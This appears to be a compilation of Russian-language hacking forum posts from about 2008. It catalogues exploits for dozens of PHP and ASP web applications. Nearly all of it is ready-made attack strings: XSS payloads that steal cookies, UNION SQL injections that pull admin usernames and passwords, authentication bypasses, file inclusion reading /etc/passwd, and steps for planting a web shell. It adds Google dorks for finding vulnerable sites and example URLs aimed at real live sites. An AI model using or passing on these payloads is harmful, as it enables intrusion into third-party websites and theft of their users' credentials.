PRO-search XSS: Уязвимости в параметрах prot, host, path, name, ext, size, search_days, show_page Code: http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Web Directory Script <= 2.0 (name) SQL Injection Vulnerability magic_quotes_gpc = Off http://localhost/[installdir]/ Exploit: Code: listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/* http://milw0rm.com/exploits/6298 Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities magic_quotes_gpc = Off http://localhost/[installdir]/ Exploit: Code: index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/* Code: index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/* Dork: made by matterdaddy http://milw0rm.com/exploits/6297 (c)~!Dok_tOR!~
iFdate <= 2.0.3 Remote SQL Injection Vulnerability Condition: magic_quotes_gpc = Off http://localhost/[installdir]/members_search.php Search Name/Nickname Exploit 1: Code: ' union select 1,concat_ws(0x3a,admin_username,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_admins/* Exploit 2: Code: ' union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_users/* http://milw0rm.com/exploits/6315 (c) ~!Dok_tOR!~
Battle Scrypt SQL Injection Author: ~!Dok_tOR!~ Date found: 26.08.08 Product: Battle Scrypt Download script: _http://rapidshare.com/files/114200827/BattleScrypt_PHP_NULLIFIED.rar.html Vulnerability Class: SQL Injection Condition: magic_quotes_gpc = Off Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/search.php Model Name: Exploit: Code: ' union select 1,user(),3/* Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/stats.php?id=' union select 1,2,3,4,5,6,7,8,9,10,11/* Big Fat Rate My Photo AdSense Website SQL Injection Author: ~!Dok_tOR!~ Date found: 29.08.08 Product: Big Fat Rate My Photo AdSense Website Price: $14.99 URL: www.dotcomallsorts.com Download script: _http://89.223.37.140/files/scripter/Big%20Fat%20Rate%20My%20Photo%20AdSense%20Website.rar Vulnerability Class: SQL Injection Exploit 1: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+admin/* Exploit 2: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+members/* Admin panel: Code: http://localhost/[COLOR="#ff8c00"][B][installdir][/B][/COLOR]/admin/ Article Publisher Pro <= v1.5 SQL Injection Author: ~!Dok_tOR!~ Date found: 30.08.08 Product: Article Publisher Pro v1.5 Price: $75 URL: www.phparticlescript.com Vulnerability Class: SQL Injection Exploit 1: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/articles.php?art_id=1+union+select+1,2,concat_ws(0x3a,aut_username,aut_password),4,5,6,7+from+flaxweb_authors+where+aut_id=1/* Exploit 2: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/userarticles.php?aut_id=-1+union+select+1,concat_ws(0x3a,aut_username,aut_password),3,4,5,6,7,8,9,10,11+from+flaxweb_authors+where+aut_id=1/* Dork: All rights reserverd © Your Articles Pro 2002-2005 Copyright 2006 - 2008, Article Publisher PRO v1.5 Keepsakes SQL Injection Author: ~!Dok_tOR!~ Date found: 28.08.08 Product: Keepsakes Price: $25 URL: harlandscripts.com Vulnerability Class: SQL Injection Condition: magic_quotes_gpc = Off Exploit 1: Code: http://localhost/[COLOR="#ff0000"][installdir][/COLOR]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+admin_sign/* Opera -> Source(Ctrl+F3) Exploit 2: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+members/* Opera -> Source(Ctrl+F3) Exploit 3: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+affiiiates/* Opera -> Source(Ctrl+F3) Exploit 4: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/showtime.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/* Exploit 5: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/showtime_noborder.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/* Admin panel: Code: http://localhost/[COLOR="#ff8c00"][B][installdir][/B][/COLOR]/admin/ Dork: Copyright Your Keepsakes ® ™ 2007 Smart Traffic 6 in 1 SQL Injection Author: ~!Dok_tOR!~ Date found: 30.08.08 Product: Smart Traffic 6 in 1 Download script: _http://rapidshare.com/files/139785932/smarttraffic.rar Vulnerability Class: SQL Injection Condition: magic_quotes_gpc = Off Exploit: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/inc.groups.php?pid=-1%27+union+select+1,2,concat_ws(0x3a,login,pswd,email)+from+members/* TopCoolive SQL Injection Author: ~!Dok_tOR!~ Date found: 30.08.08 Product: TopCoolive URL: www.vetton.ru Vulnerability Class: SQL Injection Condition: magic_quotes_gpc = Off Exploit 1: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/stats.php?id='+union+select+1,user(),password,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/* Exploit 2: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/stat_res.php?id='+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/* Exploit 3: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/img.php?id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,password,30,31,32,33,34+from+new/* Warez Script (by Mikel Dean) SQL Injection Author: ~!Dok_tOR!~ Date found: 27.08.08 Product: Warez Script Download script: _http://rapidshare.com/files/98446563/Warez_Script_English_by_Mikel_Dean.rar Vulnerability Class: SQL Injection Condition: magic_quotes_gpc = Off Exploit 1: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/v2/index.php?section=download&id='+union+select+1,2,3,4,concat_ws(0x3a,username,password)+from+ddl_users/* Exploit 2: Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/v2/index.php?section=list&subcat='+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ddl_users/* Code: http://localhost/[COLOR="#ff8c00"][B][installdir][/B][/COLOR]/v2/index.php?section=post_upload&cat='+union+select+1,2,3,4/* Admin Authentication Bypass Code: http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/v2/login.php User: 1' or 1=1/* Pass: 1' or 1=1/* (c) ~!Dok_tOR!~
На милворме был выложен эксплоит к E-Php CMS (http://milw0rm.com/exploits/6483) от разработчика www.ephpscripts.com, я решил проверить на наличие уязвимостей остальные их проекты (названия таблицы и колонок не были указаны, они одинаковые на всех скриптах). E-Php B2B Trading Marketplace Script (listings.php cid) Remote SQL Injection Vulnerability Exploit: http://www.site.com/listings.php?browse=sell&cid=-1+union+select+1,concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8+from+ephpb2b_admin/* Example: http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8+from+ephpb2b_admin/* E-Php Shop Script (search_results.php cid) Remote SQL Injection Vulnerability Exploit: http://www.site.com/search_results.php?cid=-1+union+select+concat(es_admin_name,0x3a,es_pwd),2+from+ephpb2b_admin/* Example: http://www.ephpscripts.com/demo/yng_wineshop/search_results.php?cid=-1+union+select+concat(es_admin_name,0x3a,es_pwd),2+from+ephpscri_b2badeel.ephpb2b_admin/*
Fundlink SQL: Code: site.com/showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users PHP-Newsletter SQL: Code: site/index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1 Com Endeavors SQL: Code: site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a, concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2 /**/from/**/admin/*where,limit,2-- niccell SQL: Code: site.com/list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222, concat(login,0x3a,password),444+from+admin_login/* KwsPHP SQL: Code: site.com/index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/* Esy SQL: Code: site.com/sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/* Code: site.com/ sections.php?op=printpage&artid=-9999999/** /union/**/select/**/aid,pwd/**/from/**/nuke_authors/* BosClassifieds Classified Ads System SQL: Code: site.com/bosclassifieds/index.php?cat=[SQL] pollBooth SQL: Code: site.com/pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users RS MAXSOFT SQL: Code: site.com/modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin SSWD SQL: Code: site.com/index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/* OpenLD SQL: Code: site.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null ,null,null,null,null/**/FROM/**/settings-- Site Sift SQL: Code: site.com/ndex.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/* Code: site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/* Showlink SQL: Code: site.com/index.php?showlink=ulus&fid=ulus8&p=links&area=1&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user eSyndiCat SQL: Code: site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/* Bwired SQL: i Code: site.com/ndex.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser Md-Pro SQL: Code: site.com/index.php?module=Topics&func= view&topicid=-1 UNION ALL SELECT null,null,concat (pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/* eMeeting Online Dating Software SQL: Code: site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/* Code: site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/* FlashGameScript SQL: Code: site.com/index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+ from+members+where+user_type=2/* Code: site.com/index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,user_type+fr om+members+where+user_type=2/*
Author: Dimi4 Date found: 30.10.08 Product: Image Hosting System v1.3.4 Price: n\q URL: www.webmastersadvantage.com (http://www.1phpscripts.com/Image_Hosting_System_Script.html) Vulnerability Class: XSS Vulnerability Script:viewimage.php PHP: <? $file = $_GET['file']; if ($file == "") { header("Location: " . $server_url); exit; } ..... <img src="<?= $file ?> Мда.. понял всё это зря... Открыта Админка Default path:/imageadmin/
CMS Made Simple 1.4.1, возможно более старые версии. Активная XSS в админке. Уязвимый параметр: название новой категории при ее добавлении в Content -> News -> Categories (также уязвимы имена Field Definitions). Чтобы "заставить" админа внедрить в название наш код, необходимо провести CSRF-атаку. Данные передаются через POST, но можно передать и GET'ом. Формируем ссылку: Code: http://[I]путь_до_каталога_CMS/[/I]admin/moduleinterface.php?mact=News,m1_,addcategory,0&m1_name=[COLOR=Yellow][B][XSS][/B][/COLOR] Лучше подгружать во фрейме. XSS будет доступна на странице: Code: http://[I]путь_до_каталога_CMS[/I]/admin/moduleinterface.php?module=News (с) iddqd Через жопу конечно, но все равно
StrawBerry 1.1.1 (бывший CuteNews) Инклюд для версии с TXT базами: Code: http://localhost/example/index.php?do=../../../../db/base/users.MYD%00 Инклюд по такому принципу присутствует во всех ТХТ версиях StrawBerry и CuteNews Заливка шела: Админка->Настройки->Управление картинками переименовываем шелл в .jpg и заливаем на серв. Жмём "переименовать", меняем разрешение обратно на пхп, получаем шел. Для StrawBerry 1.1.1, т.к. доступ к папке аплоад запрежён переименовываем в "../../shell.php" получаем _ttp://localhost/shell.php
Active Business Directory v 2 (Auth Bypass) SQL Injection Vulnerability script: Active Business Directory v 2 found: Ded MustD!e exploit: http://www.activewebsoftwares.com/demoactivebusinessdirectory/account.asp E-mail Address: ' or ' 1=1 Password: ' or ' 1=1 ASPReferral v 5.3 (Auth Bypass) SQL Injection Vulnerability script: ASPReferral v 5.3 found: Ded MustD!e exploit: http://www.activewebsoftwares.com/demoaspreferral/Merchant.asp E-mail Address: ' or ' 1=1-- Password: ' or ' 1=1--
ExpressionEngine Core v. 1.6.6 и другие версии и модификации вроде бы тоже (пишут, что за бугром популярен) Алгоритм хеширования: sha1(pass) - по дефолту, или md5(pass). XSS (Кстати, этим скриптом можно отправить кому угодно письмо с уязвимого сервера, с обратным адресом владельца блога): Code: POST: http://test1.ru/system/utilities/email_test.php recipient=1"><script>alert(/XSS1/)</script>&subject=2"><script>alert(/XSS2/)</script>&message=3"></textarea><script>alert(/XSS3/)</script> При неудалённом install.php: LFI: Code: http://test1.ru/install.php?page=4 system_dir=system&ext=/../../1.php //Если system_dir не system (по дефолту), то следует изменить на актуальный. LFI: Code: http://test1.ru/install.php?page=5 ext=/../../1.php LFI: Code: http://test1.ru/install.php?page=6 ext=/../../1.php LFI: Code: http://test1.ru/install.php?page=7 rebuild_config=1&ext=/../../1.php Раскрытие путей : Code: http://test1.ru/system/utilities/admin.php http://test1.ru/system/utilities/dbtest.php Раскрытие путей (при register_globals=ON): Code: http://test1.ru/system/update.php?conf=1 Раскрытие информации о пользователях, префикса таблиц БД, ip адресов юзеров(да и не только): Папки не спрятаны .htaccess'ом, в диком интернете в db_cache можно найти интересную информацию: Code: /system/cache/sql_cache/ /system/cache/db_cache/ /system/cache/magpie_cache/ /system/cache/page_cache/ /system/cache/tag_cache/ Например: http://concerningdesign.org/system/cache/db_cache/6a992d5529f459a44fee58c733255e86/6c6237982ae04c3a69cea9d2ca9a6a3e (информация о пользователях логин, мыло и т.п.) dork: "powered by ExpressionEngine" (кстати, действительно, довольно много)
Energine скину сюда,потому что я ослеп,и не вижу тему "Уязвимости бесплатных ЦМС" SQL Inj: Code: site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/* XSS: В поиск: Code: "><script>alert()</script>
CMS: [ ACMS™ ] Developer: [ http://www.acalog.com/ ] Dork: [ Powered by the acalog™ academic catalog management system (ACMS™) inurl:"?coid=" ] Bug type: [ Blind Sql Injection ] Bug: [ coid=63+and+ascii(lower(substring((version()),1,1)))=52/* ] Example: [ http://catalog.sdstate.edu/preview_course.php?catoid=2&coid=63+and+ascii(lower(substring((version()),1,1)))=52/* ] Примечательно, что большинство сайтов с бажной цмс находятся в доменной зоне .edu
Уязвимости FAQMasterFlex [Уязвимости FAQMasterFlex]Условие: magic_quotes_gpc = OFF 1. File:faq.php Уязвимый кусок кода: PHP: $result = mysql_query("SELECT * FROM faqs WHERE category_id = '$category_id'") or die(mysql_error()); SQL иньекция: Code: http://path/FAQMasterFlex/faq.php?answer=2&cat_name=FAQMasterFlex%20Usage&category_id=1'+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/* 2. File:faq_admin.php Уязвимый кусок кода: PHP: $result = mysql_query("SELECT * FROM faqs WHERE category_id = '$category'") or die(mysql_error()); SQL иньекция: Code: http://path/FAQMasterFlex/faq_admin.php?category='+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*&cat_name= Google dork:"Powered by Lethal Penguin." http://www.lethalpenguin.net/design/faqmasterflex.php?download=true
Textpattern v.4.0.3 Passive XSS Code: http://localhost/textpattern/index.php?event=tag&name=image&id=1&ext=[COLOR=Yellow][B]</textarea><script>alert(document.cookie)</script>[/B][/COLOR]&alt=&h=1&w=400&type=textile Code: http://localhost/textpattern/index.php?event=log&step=list&page=1[COLOR=Yellow][B]<script>alert(document.cookie)</script>[/B][/COLOR] Active XSS Написать новую статью => http://localhost/textpattern/index.php?event=article => в заголовок вставляем код Code: <script>alert()</script> или </title><script>alert()</script> Категории => уязвимо поле "Название". Файлы => поле "Описание". Ссылки => поля "Заголовок" и "Описание". (c) iddqd
MODx 0.9.6.2 Passive XSS Code: /assets/modules/docmanager/includes/tv.ajax.php POST: tplID=-1&langNoTV=<body onLoad=alert('ok')> Code: /assets/plugins/tinymce3101/tinymce.linklist.php?list=<script>alert(/XSS/)</script> register_globals [B]ON[/B] Code: /assets/snippets/ditto/extenders/request.extender.inc.php?dbg=1&stripTags=0&ditto_<script>alert(/XSS/)</script> register_globals [B]ON[/B] В этом случае забавно то, что XSS в имени параметра, а вот значение фильтруется жёстко. Раскрытия путей Code: assets/cache/siteCache.idx.php manager/includes/rss.inc.php manager/includes/browsercheck.inc.php manager/includes/sniff/phpSniff.class.php manager/includes/extenders/getUserData.extender.php assets/snippets/ditto/formats/xml.format.inc.php assets/snippets/ditto/formats/rss.format.inc.php assets/snippets/ditto/formats/json.format.inc.php assets/snippets/ditto/classes/debug.class.inc.php assets/snippets/ditto/formats/atom.format.inc.php assets/snippets/ditto/extenders/tagging.extender.inc.php manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpell.php assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/GoogleSpell.php assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/EnchantSpell.php assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php
bbpress bbpress v1.0 File: realplay.php Уязвимый кусок кода: Code: <?php echo (get_magic_quotes_gpc() ? stripslashes($_GET['link']) : $_GET['link']); ?> XSS иньекция: Code: http:/path/inc/realplay.php?link=%3Cscript%3Ealert(document.cooki e)%3C/script%3E Активная XSS: В /inc/realplay.php поле email вводим: Code: <script>alert()</script>
WorkingOnWeb File: admin.inc.php Уязвимый кусок кода: Code: $user = ""; $pass = ""; if (isset($_POST['loginname']) && $_POST['loginname'] != "") $user = $_POST['loginname']; if (isset($_POST['loginpass']) && $_POST['loginpass'] != "") $pass = $_POST['loginpass']; $loggedin = $this->loginuser($user, $pass); SQL Иньекция: Code: http://path/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/* XSS иньекция: Code: http://path/wow/index.php/"><script>alert(document.cookie)</script>
iGaming CMS Файл: lang.php Уязвимый код: Code: if(isset($_GET['lang'])) $include_lang = $_GET['lang']; } elseif(file_exists(TOP_DIR.'/sql/db_connect.php')) { include_once(TOP_DIR.'/functions/db_api.php'); $include_lang = get_language(); } else { $include_lang = get_http_accept_lang(); } include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php'); Code: http://path/docs/index.php?lang=/../../../../../../../../../../test Если magic_quotes_gpc = Off,тогда: Code: http://path/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00 Файл: install.php Уязвимый код: Code: switch($_GET['whatlang']) { case 1: include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php'); break; default: include_once(TOP_DIR.'/lang/lang.English.php'); break; } Code: http://path/install.php?whatlang=1&language=/../../../../../../../test Если magic_quotes_gpc = Off,то: Code: http://path/install.php?whatlang=1&language=/../../../../../../../etc/passwd%00 SQL иньекция: Code: http://path/index.php?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/* XSS иньекция: Code: http://path/search/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
Wheatblog Файл: main.php Кусок уязвимого кода: Code: $config = ereg_replace(":","", $config); $config = trim(ereg_replace("../","", $config)); $config = trim(ereg_replace("/","", $config)); if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";} Code: http://path/main.php?config=eregi.inc.php\\..\\admin\\.htaccess Если magic_quotes_gpc =ON,то: Code: http://path/main.php?config=eregi.inc.php\..\admin\.htaccess XSS иньекция: Code: http://path/index.php?action=category&id=<script>alert(document.cookie)</script>
